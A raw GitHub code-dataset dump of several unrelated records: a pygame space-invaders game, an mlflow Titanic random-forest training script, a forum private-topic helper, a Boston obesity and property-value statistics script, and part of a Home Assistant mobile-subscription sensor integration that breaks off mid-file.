sprite methods\nfrom time import sleep\nimport pygame.mixer\nimport pygame.event\nimport numpy as np\n\n# Custom imports\n\nfrom settings import Settings\nfrom ship import Ship\nfrom bullet import Bullet\nfrom alien import Alien\nfrom game_stats import GameStats\nfrom button import Button\nfrom scoreboard import Scoreboard\n\nclass AlienInvasion:\n \"\"\"Overall class to manage game assets and behavior.\"\"\"\n\n def __init__(self):\n \"\"\"Initialise the game and create game resources.\"\"\"\n pygame.init()\n\n # Initialise Sounds\n pygame.mixer.init()\n\n buffer1 = np.sin(2 * np.pi * np.arange(44100) * 600 / 44100).astype(np.float32)\n self.sound_bullet = pygame.mixer.Sound(buffer1)\n buffer2 = np.sin(2 * np.pi * np.arange(44100) * 480 / 44100).astype(np.float32)\n self.sound_alien = pygame.mixer.Sound(buffer2)\n\n self.settings = Settings()\n\n # Windowed\n self.screen = pygame.display.set_mode((self.settings.screen_width, self.settings.screen_height))\n\n # Fullscreen\n # self.screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\n # self.settings.screen_width = self.screen.get_rect().width\n # self.settings.screen_height = self.screen.get_rect().height\n \n pygame.display.set_caption(\"Alien Invasion\")\n\n # Create an instance to store game statistics\n # and create a scoreboard\n self.stats = GameStats(self)\n self.sb = Scoreboard(self)\n\n self.ship = Ship(self)\n self.bullets = pygame.sprite.Group()\n self.aliens = pygame.sprite.Group()\n \n self._create_fleet()\n\n # Make the play button\n self.play_button = Button(self, \"Play\")\n\n def run_game(self):\n \"\"\"Start the main loop for the game.\"\"\"\n while True:\n self._check_events()\n\n if self.stats.game_active:\n self.ship.update()\n self._update_bullets()\n\n self._update_aliens()\n self._update_screen()\n\n def _check_events(self):\n \"\"\"Respond to keyboard and mouse events\"\"\"\n # Helper Method\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.stats.save_high_score()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n self._check_keydown_events(event)\n elif event.type == pygame.KEYUP:\n self._check_keyup_events(event)\n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = pygame.mouse.get_pos()\n self._check_play_button(mouse_pos)\n\n def _check_keydown_events(self, event):\n \"\"\"Respond to key presses\"\"\"\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = True\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = True\n elif event.key == pygame.K_q or event.key == pygame.K_ESCAPE:\n self.stats.save_high_score()\n sys.exit()\n elif event.key == pygame.K_SPACE:\n self._fire_bullet()\n elif event.key == pygame.K_RETURN or event.key == pygame.K_p:\n self._start_game()\n\n def _check_keyup_events(self,event):\n \"\"\"Respond to key releases\"\"\"\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = False\n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = False\n\n def _check_play_button(self, mouse_pos):\n \"\"\"Start a new game when the player clicks on Play\"\"\"\n button_clicked = self.play_button.rect.collidepoint(mouse_pos)\n if button_clicked and not self.stats.game_active:\n self._start_game()\n \n def _start_game(self):\n \"\"\"Check if a game is already in play before resetting the game\"\"\"\n if not self.stats.game_active:\n # Reset the game settings\n self.settings.initialise_dynamic_settings()\n self.stats.reset_stats()\n self.stats.game_active = True\n self.sb.prep_images()\n\n # Get rid of any remaining aliens and bullets\n self.aliens.empty()\n self.bullets.empty()\n\n # Create a new fleet and center the ship\n self._create_fleet()\n self.ship.centre_ship()\n\n # Hide the mouse pointer\n pygame.mouse.set_visible(False)\n\n def _fire_bullet(self):\n \"\"\"Create a new bullet and add it to the bullets group\"\"\"\n if len(self.bullets) < self.settings.bullets_allowed and self.stats.game_active:\n new_bullet = Bullet(self)\n self.bullets.add(new_bullet)\n self.sound_bullet.play(0,50)\n self.stats.bullets_fired += 1\n self.sb.prep_accuracy()\n\n def _update_bullets(self):\n \"\"\"Update position of bullets and get rid of old bullets\"\"\"\n # Update bullet position\n self.bullets.update()\n\n # Get rid of bullets that have gone off the top of the screen\n for bullet in self.bullets.copy():\n if bullet.rect.bottom <= 0:\n self.bullets.remove(bullet)\n \n self._check_bullet_alien_collisions()\n\n def _check_bullet_alien_collisions(self):\n \"\"\"Respond to bullet-alien collisions\"\"\"\n # Check for any bullets that have hit aliens.\n # If so, get rid of the bullet and the alien.\n\n collisions = pygame.sprite.groupcollide(\n self.bullets, self.aliens, True, True)\n\n if collisions:\n # print(collisions)\n for aliens in collisions.values():\n # Make sure that we count all the hit aliens\n self.stats.score += self.settings.alien_points * len(aliens)\n self.stats.bullets_on_target += len(aliens)\n self.sb.prep_score()\n self.sb.prep_accuracy()\n self.sb.check_high_score() # Which also preps high score if changed\n\n if not self.aliens: # the aliens group is empty\n self._start_new_level()\n\n def _start_new_level(self):\n # Destroy existing bullets and create a new fleet\n self.bullets.empty()\n self._create_fleet()\n # Increase the game speed\n self.settings.increase_speed()\n\n # Inscrease level (which is now an attribute of score so is rendered with that)\n self.stats.level += 1\n\n def _update_aliens(self):\n \"\"\"Check if the fleet is at the an edge,\n then update the position of all aliens in the fleet\"\"\"\n self._check_fleet_edges()\n self.aliens.update()\n\n # Look for alien-ship collisions\n if pygame.sprite.spritecollideany(self.ship, self.aliens):\n self._ship_hit()\n\n # Look for aliens landing\n self._check_aliens_bottom()\n\n def _create_fleet(self):\n \"\"\"Create the fleet of aliens\"\"\"\n # Create an alien and find out how many can fit on a row\n # Space between each alien is equal to one alien width\n alien = Alien(self)\n alien_width, alien_height = alien.rect.size\n # Subtracted 1 from screen width to avoid situation when width is exactly divisible by alien - GG\n available_space_x = (self.settings.screen_width - 1) - (2 * alien_width)\n number_aliens_x = (self.settings.screen_width - 1) // (2 * alien_width)\n\n # Determing the number of rows of aliens that fit on the screen\n ship_height = self.ship.rect.height\n available_space_y = (self.settings.screen_height - \n (3 * alien_height) - ship_height)\n number_rows = available_space_y // (2 * alien_height)\n\n # Create the fleet of aliens\n for row_number in range(number_rows):\n for alien_number in range(number_aliens_x):\n self._create_alien(alien_number, row_number)\n\n def _create_alien(self, alien_number, row_number):\n \"\"\" Create an alien and place it in the row \"\"\"\n alien = Alien(self)\n alien_width, alien_height = alien.rect.size\n alien.x = alien_width + 2 * alien_width * alien_number\n alien.rect.x = alien.x\n alien.rect.y = alien.rect.height + 2 * alien.rect.height * row_number\n self.aliens.add(alien)\n\n def _check_fleet_edges(self):\n \"\"\"Respond appropriately if any aliens have reached an edge\"\"\"\n for alien in self.aliens.sprites():\n if alien.check_edges():\n self._change_fleet_direction()\n self.sound_alien.play(0,50)\n break\n\n def _check_aliens_bottom(self):\n \"\"\"Check if any aliens have reached the bottom of the screen\"\"\"\n screen_rect = self.screen.get_rect()\n for alien in self.aliens.sprites():\n if alien.rect.bottom >= screen_rect.bottom:\n # Treat this the same as if the ship got hit (aliens have landed)\n self._ship_hit()\n break\n\n def _change_fleet_direction(self):\n \"\"\"Drop the entire fleet and change the fleet's direction\"\"\"\n if self.stats.game_active: # If not active the aliens should bound back and forth (Demo mode)\n for alien in self.aliens.sprites():\n alien.rect.y += self.settings.fleet_drop_speed\n self.settings.fleet_direction *= -1\n \n def _update_screen(self):\n \"\"\"Update images on the screen, and flip to the new screen\"\"\"\n # Helper Method\n self.screen.fill(self.settings.bg_color)\n self.ship.blitme()\n\n for bullet in self.bullets.sprites():\n bullet.draw_bullet()\n\n self.aliens.draw(self.screen)\n \n # Draw the scoreboard\n self.sb.show_score()\n \n # Draw the play button if the game is inactive\n if not self.stats.game_active:\n self.play_button.draw_button()\n\n # Make the most recently drawn screen visible.\n pygame.display.flip()\n\n def _ship_hit(self):\n \"\"\"Respond to the ship being hit by an alien\"\"\"\n\n # Pause to let the player see they've been hit/had an alien land\n\n if self.stats.ships_left > 0:\n # Decrement ships left & update the lives left (scoreboard)\n self.stats.ships_left -= 1\n self.sb.prep_ships()\n\n # Get rid of any remaining aliens and bullets\n self.aliens.empty()\n self.bullets.empty()\n\n # Create a new fleet and centre the ship\n self._create_fleet()\n self.ship.centre_ship()\n\n # Pause to let the player regroup\n sleep(0.5)\n else:\n self.stats.game_active = False\n pygame.mouse.set_visible(True)\n\nif __name__ == '__main__':\n # Make a game instance and run the game.\n ai = AlienInvasion()\n ai.run_game()", "repo_name": "ClearSky0/AlienInvasion", "sub_path": "alien_invasion.py", "file_name": "alien_invasion.py", "file_ext": "py", "file_size_in_byte": 11940, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "rich.traceback.install", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.mouse.init", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.mouse", "line_number": 46, "usage_type": "name"}, {"api_name": "pygame.mouse.mixer.init", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.mouse.mixer", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.sin", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 51, "usage_type": "attribute"}, {"api_name": "pygame.mouse.mixer.Sound", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.mouse.mixer", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.sin", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.arange", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 53, "usage_type": "attribute"}, {"api_name": "pygame.mouse.mixer.Sound", "line_number": 54, "usage_type": "call"}, {"api_name": "pygame.mouse.mixer", "line_number": 54, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 54, "usage_type": "name"}, {"api_name": "settings.Settings", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.mouse.display.set_mode", "line_number": 59, "usage_type": "call"}, {"api_name": "pygame.mouse.display", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 59, "usage_type": "name"}, {"api_name": "pygame.mouse.display.set_caption", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.mouse.display", "line_number": 66, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 66, "usage_type": "name"}, {"api_name": "game_stats.GameStats", "line_number": 70, "usage_type": "call"}, {"api_name": "scoreboard.Scoreboard", "line_number": 71, "usage_type": "call"}, {"api_name": "ship.Ship", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.mouse.sprite.Group", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.mouse.sprite", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 74, "usage_type": "name"}, {"api_name": "pygame.mouse.sprite.Group", "line_number": 75, "usage_type": "call"}, {"api_name": "pygame.mouse.sprite", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 75, "usage_type": "name"}, {"api_name": "button.Button", "line_number": 80, "usage_type": "call"}, {"api_name": "pygame.mouse.event.get", "line_number": 97, "usage_type": "call"}, {"api_name": "pygame.mouse.event", "line_number": 97, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 97, "usage_type": "name"}, {"api_name": "pygame.mouse.QUIT", "line_number": 98, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 98, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 100, "usage_type": "call"}, {"api_name": "pygame.mouse.KEYDOWN", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 101, "usage_type": "name"}, {"api_name": "pygame.mouse.KEYUP", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 103, "usage_type": "name"}, {"api_name": "pygame.mouse.MOUSEBUTTONDOWN", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 105, "usage_type": "name"}, {"api_name": "pygame.mouse.mouse.get_pos", "line_number": 106, "usage_type": "call"}, {"api_name": "pygame.mouse.mouse", "line_number": 106, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 106, "usage_type": "name"}, {"api_name": "pygame.mouse.K_RIGHT", "line_number": 111, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 111, "usage_type": "name"}, {"api_name": "pygame.mouse.K_LEFT", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 113, "usage_type": "name"}, {"api_name": "pygame.mouse.K_q", "line_number": 115, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 115, "usage_type": "name"}, {"api_name": "pygame.mouse.K_ESCAPE", "line_number": 115, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 117, "usage_type": "call"}, {"api_name": "pygame.mouse.K_SPACE", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 118, "usage_type": "name"}, {"api_name": "pygame.mouse.K_RETURN", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 120, "usage_type": "name"}, {"api_name": "pygame.mouse.K_p", "line_number": 120, "usage_type": "attribute"}, {"api_name": "pygame.mouse.K_RIGHT", "line_number": 125, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 125, "usage_type": "name"}, {"api_name": "pygame.mouse.K_LEFT", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 127, "usage_type": "name"}, {"api_name": "pygame.mouse.mouse.set_visible", "line_number": 154, "usage_type": "call"}, {"api_name": "pygame.mouse.mouse", "line_number": 154, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 154, "usage_type": "name"}, {"api_name": "bullet.Bullet", "line_number": 159, "usage_type": "call"}, {"api_name": "bullet.rect", "line_number": 172, "usage_type": "attribute"}, {"api_name": "pygame.mouse.sprite.groupcollide", "line_number": 182, "usage_type": "call"}, {"api_name": "pygame.mouse.sprite", "line_number": 182, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 182, "usage_type": "name"}, {"api_name": "pygame.mouse.sprite.spritecollideany", "line_number": 215, "usage_type": "call"}, {"api_name": "pygame.mouse.sprite", "line_number": 215, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 215, "usage_type": "name"}, {"api_name": "alien.Alien", "line_number": 225, "usage_type": "call"}, {"api_name": "alien.rect", "line_number": 226, "usage_type": "attribute"}, {"api_name": "alien.Alien", "line_number": 244, "usage_type": "call"}, {"api_name": "alien.rect", "line_number": 245, "usage_type": "attribute"}, {"api_name": "alien.x", "line_number": 246, "usage_type": "attribute"}, {"api_name": "alien.rect", "line_number": 247, "usage_type": "attribute"}, {"api_name": "alien.x", "line_number": 247, "usage_type": "attribute"}, {"api_name": "alien.rect", "line_number": 248, "usage_type": "attribute"}, {"api_name": "alien.check_edges", "line_number": 254, "usage_type": "call"}, {"api_name": "alien.rect", "line_number": 263, "usage_type": "attribute"}, {"api_name": "alien.rect", "line_number": 272, "usage_type": "attribute"}, {"api_name": "bullet.draw_bullet", "line_number": 282, "usage_type": "call"}, {"api_name": "pygame.mouse.display.flip", "line_number": 294, "usage_type": "call"}, {"api_name": "pygame.mouse.display", "line_number": 294, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 294, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 315, "usage_type": "call"}, {"api_name": "pygame.mouse.mouse.set_visible", "line_number": 318, "usage_type": "call"}, {"api_name": "pygame.mouse.mouse", "line_number": 318, "usage_type": "attribute"}, {"api_name": "pygame.mouse", "line_number": 318, "usage_type": "name"}]} +{"seq_id": "30116020395", "text": "import os\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import (accuracy_score,\n precision_score,\n recall_score,\n f1_score,\n confusion_matrix,\n roc_curve,\n roc_auc_score,\n precision_recall_curve,\n average_precision_score)\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport pandas as pd\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nimport matplotlib.pyplot as plt\nimport math\nimport mlflow\nDATA_DIR = './data'\nDATASET_PATH = os.path.join(DATA_DIR,'Titanic+Data+Set.csv')\nPROCESSED_DATASET_PATH = os.path.join(DATA_DIR,'Titanic+Data+Set+Preprocess.csv')\n\n\ndef train_model(model, x_train, y_train):\n model.fit(x_train, y_train)\n\ndef evaluate_model(model, x_test, y_test):\n predictions = model.predict(x_test)\n rmse = math.sqrt(mean_squared_error(y_test,predictions))\n print(rmse)\n mlflow.log_metric(\"rmse\", rmse)\n mlflow.log_metric(\"precision\", precision_score(y_test,predictions))\n mlflow.log_metric(\"acc_score\", accuracy_score(y_test,predictions))\n mlflow.log_metric(\"f1_score\", f1_score(y_test,predictions))\n mlflow.log_metric(\"recall_score\", recall_score(y_test,predictions))\n\n\n\n\nif __name__ == '__main__':\n data = pd.read_csv(PROCESSED_DATASET_PATH)\n\n\n ## Split the data \n train, test = train_test_split(data, test_size=0.2)\n\n X = train.drop('Survived', axis=1)\n y = train['Survived']\n\n X_test = test.drop('Survived', axis=1)\n y_test = test['Survived']\n\n \n \n estimators= [10, 20, 30, 40]\n max_features=['auto','sqrt']\n\n #mlflow.create_experiment(\"titanic\")\n mlflow.set_experiment(\"titanic\")\n for max_feature in max_features:\n for f in range(len(estimators)):\n \n with mlflow.start_run():\n n_estimators = estimators[f]\n mlflow.log_param(\"n_estimators\",n_estimators)\n mlflow.log_param(\"max_feature\",max_feature)\n model = RandomForestClassifier(n_estimators=n_estimators,max_features=max_feature ,random_state=0)\n train_model(model, X, y)\n evaluate_model(model, X_test, y_test)\n mlflow.sklearn.log_model(model, \"RandomForestClassifier\")\n print(\"model run:\", mlflow.active_run().info.run_uuid)\n mlflow.end_run()", "repo_name": "chandana-srinivas/gl_mlflow_assignment", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2591, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.join", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 30, "usage_type": "call"}, {"api_name": "mlflow.log_metric", "line_number": 32, "usage_type": "call"}, {"api_name": "mlflow.log_metric", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_score", "line_number": 33, "usage_type": "call"}, {"api_name": "mlflow.log_metric", "line_number": 34, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 34, "usage_type": "call"}, {"api_name": "mlflow.log_metric", "line_number": 35, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 35, "usage_type": "call"}, {"api_name": "mlflow.log_metric", "line_number": 36, "usage_type": "call"}, {"api_name": "sklearn.metrics.recall_score", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 42, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 46, "usage_type": "call"}, {"api_name": "mlflow.set_experiment", "line_number": 60, "usage_type": "call"}, {"api_name": "mlflow.start_run", "line_number": 64, "usage_type": "call"}, {"api_name": "mlflow.log_param", "line_number": 66, "usage_type": "call"}, {"api_name": "mlflow.log_param", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 68, "usage_type": "call"}, {"api_name": "mlflow.sklearn.log_model", "line_number": 71, "usage_type": "call"}, {"api_name": "mlflow.sklearn", "line_number": 71, "usage_type": "attribute"}, {"api_name": "mlflow.active_run", "line_number": 72, "usage_type": "call"}, {"api_name": "mlflow.end_run", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "39613600704", "text": "from datetime import datetime\n\nfrom zds.utils.templatetags.emarkdown import emarkdown\n\n\nclass LeavePrivateTopic:\n \"\"\"\n Leave a private topic.\n \"\"\"\n\n def perform_destroy(self, topic):\n if topic.one_participant_remaining():\n topic.delete()\n else:\n topic.remove_participant(self.get_current_user())\n topic.save()\n\n def get_current_user(self):\n raise NotImplementedError(\"`get_current_user()` must be implemented.\")\n\n\nclass UpdatePrivatePost:\n \"\"\"\n Updates a private topic.\n \"\"\"\n\n def perform_update(self, instance, data, hat=None):\n instance.hat = hat\n instance.text = data.get(\"text\")\n instance.text_html = emarkdown(data.get(\"text\"))\n instance.update = datetime.now()\n instance.save()\n return instance\n", "repo_name": "zestedesavoir/zds-site", "sub_path": "zds/mp/commons.py", "file_name": "commons.py", "file_ext": "py", "file_size_in_byte": 824, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 262, "dataset": "github-code", "pt": "61", "api": [{"api_name": "zds.utils.templatetags.emarkdown.emarkdown", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "32407755075", "text": "from urllib.request import urlopen\nimport json\nimport pymongo\nimport datetime\nimport uuid\nimport time\nimport ssl\nimport random\nfrom math import radians, sin, cos, atan2, sqrt\nimport scipy.stats as ss\nfrom sklearn.cluster import k_means\nfrom geopy.distance import vincenty as Distance\nfrom shapely.geometry import shape, Point, Polygon\nimport numpy as np\nimport sys\n\ndef union(R, S):\n return R + S\n\ndef difference(R, S):\n return [t for t in R if t not in S]\n\ndef intersect(R, S):\n return [t for t in R if t in S]\n\ndef project(R, p):\n return [p(t) for t in R]\n\ndef select(R, s):\n return [t for t in R if s(t)]\n \ndef product(R, S):\n return [(t,u) for t in R for u in S]\n\ndef aggregate(R, f):\n keys = {r[0] for r in R}\n return [(key, f([v for (k,v) in R if k == key])) for key in keys]\n\nclient = pymongo.MongoClient()\nrepo = client['biel_otis']\nrepo.authenticate('biel_otis', 'biel_otis')\n\nuserZip = sys.argv[1]\nuserLat = float(sys.argv[2])\nuserLng = float(sys.argv[3])\n\nretDict = {}\n\nobesityValues = list(repo['biel_otis.ObesityData'].find({\"cityname\": \"Boston\"}))\npropertyValues = list(repo['biel_otis.PropertyValues'].find({\"OWNER_MAIL_ZIPCODE\": userZip + \"_\"}))\nmapValues = list(repo['biel_otis.BostonZoning'].find())\ncorrelations = list(repo['biel_otis.ObesityPropertyCorrelation'].find())\n\ntotal_propVal = 0\ncount = 0\nfor x in propertyValues:\n total_propVal += float(x['AV_TOTAL'])\n count += 1\n\nif count != 0:\n retDict[\"AveragePropVal\"] = total_propVal / count\nelse:\n retDict[\"AveragePropVal\"] = 0\n\n\nobeseAgg = [('*', 1) for x in obesityValues if Distance((float(x[\"geolocation\"][\"latitude\"]), float(x[\"geolocation\"][\"longitude\"])), (userLat, userLng)).miles < 1.0]\ntotal = aggregate(obeseAgg, sum)\n\nif (total != []):\n retDict[\"TotalObese\"] = total[0][1]\n\nfor f in mapValues[0]:\n if (f == '_id'):\n continue\n else:\n if (f == \"South Boston\" or f == \"South Boston Neighborhood\"):\n mapValues[0][f]['coordinates'][0][0] = [(x,y) for (y,x) in mapValues[0][f]['coordinates'][0][0]]\n else:\n mapValues[0][f]['coordinates'][0] = [(x,y) for (y,x) in mapValues[0][f]['coordinates'][0]]\n \np = Point(userLat, userLng)\nneighborhood = \"\"\nfor f in mapValues[0]:\n if (f == \"_id\"):\n continue\n else:\n poly = shape(mapValues[0][f])\n if (poly.contains(p)):\n neighborhood = f\n\nif (neighborhood != \"\"):\n retDict['CorrelationCoefficient'] = correlations[0][neighborhood]\n\nretDict[\"lat\"] = userLat\nretDict[\"lng\"] = userLng\n\nprint(str(retDict))\n\n\n", "repo_name": "data-mechanics/course-2017-fal-proj", "sub_path": "biel_otis/visualization/visualizationStats.py", "file_name": "visualizationStats.py", "file_ext": "py", "file_size_in_byte": 2554, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pymongo.MongoClient", "line_number": 39, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 44, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 45, "usage_type": "attribute"}, {"api_name": "geopy.distance.vincenty", "line_number": 66, "usage_type": "call"}, {"api_name": "shapely.geometry.Point", "line_number": 81, "usage_type": "call"}, {"api_name": "shapely.geometry.shape", "line_number": 87, "usage_type": "call"}]} +{"seq_id": "17406994221", "text": "import logging\n\nfrom .const import (\n\tCONF_CLIENT,\n\tCONF_PLATFORM,\n\tCONF_SEPARATE_DATA_SENSORS,\n\tDOMAIN,\n\tUPDATE_INTERVAL,\n\tHA_ATTRIBUTION,\n\tHA_LAST_RECORD,\n\tHA_PHONENUMBER,\n\tHA_SPACE,\n\tHA_TOTAL,\n\tHA_UNIT_OF_MEASUREMENT_DATA,\n\tHA_UNIT_OF_MEASUREMENT_SUBSCRIPTION,\n\tHA_USED,\n\tHA_USERNAME,\n\tHA_USERS,\n\tR_BALANCE,\n\tR_DATA,\n\tR_DATE,\n\tR_PHONENUMBER,\n\tR_USERNAME,\n\tSTR_NAME,\n\tSTR_PACKAGE,\n\tSTR_USERS,\n\tSTR_USED,\n)\nfrom homeassistant.const import DEVICE_CLASS_MONETARY, ATTR_ATTRIBUTION\n\nfrom datetime import datetime, timedelta\n\nfrom homeassistant.components.sensor import SensorEntity\nfrom homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed\n\n_LOGGER: logging.Logger = logging.getLogger(__package__)\n_LOGGER = logging.getLogger(__name__)\n\nasync def async_setup_platform(hass, config, async_add_entities, discovery_info = None):\n\t\"\"\"Setup sensor platform\"\"\"\n\n\tasync def async_update_data():\n\t\t# try:\n\t\tclient = hass.data[DOMAIN][CONF_CLIENT]\n\t\tawait hass.async_add_executor_job(client.getData)\n\t\t# except Exception as e:\n\t\t# \traise UpdateFailed(f\"Error communicating with server: {e}\")\n\n\tcoordinator = DataUpdateCoordinator(\n\t\thass,\n\t\t_LOGGER,\n\t\tname = CONF_PLATFORM,\n\t\tupdate_method = async_update_data,\n\t\tupdate_interval = timedelta(minutes = UPDATE_INTERVAL)\n\t)\n\n\t# Immediate refresh\n\tawait coordinator.async_request_refresh()\n\n\t# Add the sensors\n\tclient = hass.data[DOMAIN][CONF_CLIENT]\n\tentities = []\n\t\n\tfor subscription in client._subscriptions:\n\t\tentities.append(SubscriptionSensor(hass, coordinator, subscription))\n\n\tif hass.data[DOMAIN][CONF_SEPARATE_DATA_SENSORS]:\n\t\tfor phoneNo in client._packageAndConsumption:\n\t\t\tentities.append(DataSensor(hass, coordinator, phoneNo, client._users[phoneNo]))\n\n\tasync_add_entities(entities)\n\nclass SubscriptionSensor(SensorEntity):\n\tdef __init__(self, hass, coordinator, subscription) -> None:\n\t\tself._hass = hass\n\t\tself._coordinator = coordinator\n\t\tself._subscription = subscription\n\t\tself._client = hass.data[DOMAIN][CONF_CLIENT]\n\n\t@property\n\tdef name(self) -> str:\n\t\tname = DOMAIN + HA_SPACE\n\t\tif len(self._subscription[STR_USERS]) > 1:\n\t\t\tname += self._subscription[STR_NAME]\n\t\telse:\n\t\t\tname += str(self._subscription[STR_USERS][0][R_PHONENUMBER])\n\t\treturn name\n\n\t@property\n\tdef state(self):\n\t\treturn self._subscription[R_BALANCE]\n\n\t@property\n\tdef unit_of_measurement(self) -> str:\n\t\treturn HA_UNIT_OF_MEASUREMENT_SUBSCRIPTION\n\n\t@property\n\tdef unique_id(self):\n\t\treturn DOMAIN + \"_\" + str(self._subscription[STR_USERS][0][R_PHONENUMBER])\n\n\t@property\n\tdef device_class(self) -> str:\n\t\treturn DEVICE_CLASS_MONETARY\n\n\t@property\n\tdef extra_state_attributes(self):\n\t\t# Prepare a dictionary with attributes\n\t\tattr = { ATTR_ATTRIBUTION: HA_ATTRIBUTION, HA_USERS: [] }\n\n\t\t# Extract Username, Phonenumber and Consumption from the subscription\n\t\tfor user in self._subscription[STR_USERS]:\n\t\t\tphoneNo = user[R_PHONENUMBER]\n\t\t\tattr[HA_USERS].append( { HA_USERNAME: user[R_USERNAME], HA_PHONENUMBER: phoneNo} )\n\t\t\tif R_DATE in self._client._packageAndConsumption[phoneNo]:\n\t\t\t\tattr[HA_LAST_RECORD] = self._client._packageAndConsumption[phoneNo][R_DATE]\n\t\t\tfor key in self._client._packageAndConsumption[phoneNo][STR_USED]:\n\t\t\t\tnewKey = (key + HA_SPACE + HA_USED).lower()\n\t\t\t\tif newKey not in attr:\n\t\t\t\t\tattr[newKey] = 0\n\t\t\t\tattr[newKey] += self._client._packageAndConsumption[phoneNo][STR_USED][key]\n\n\t\t# Extract Package info from the first User\n\t\tphoneNo = self._subscription[STR_USERS][0][R_PHONENUMBER]\n\t\tfor key in self._client._packageAndConsumption[phoneNo][STR_PACKAGE]:\n\t\t\tattr[(key + HA_SPACE + HA_TOTAL).lower()] = self._client._packageAndConsumption[phoneNo][STR_PACKAGE][key]\n\n\t\treturn attr\n\n\t@property\n\tdef should_poll(self):\n\t\t\"\"\"No need to poll. Coordinator notifies entity of updates.\"\"\"\n\t\treturn False\n\n\t@property\n\tdef available(self):\n\t\t\"\"\"Return if entity is available.\"\"\"\n\t\treturn self._coordinator.last_update_success\n\n\tasync def async_update(self):\n\t\t\"\"\"Update the entity. Only used by the generic entity update service.\"\"\"\n\t\tawait self._coordinator.async_request_refresh()\n\n\tasync def 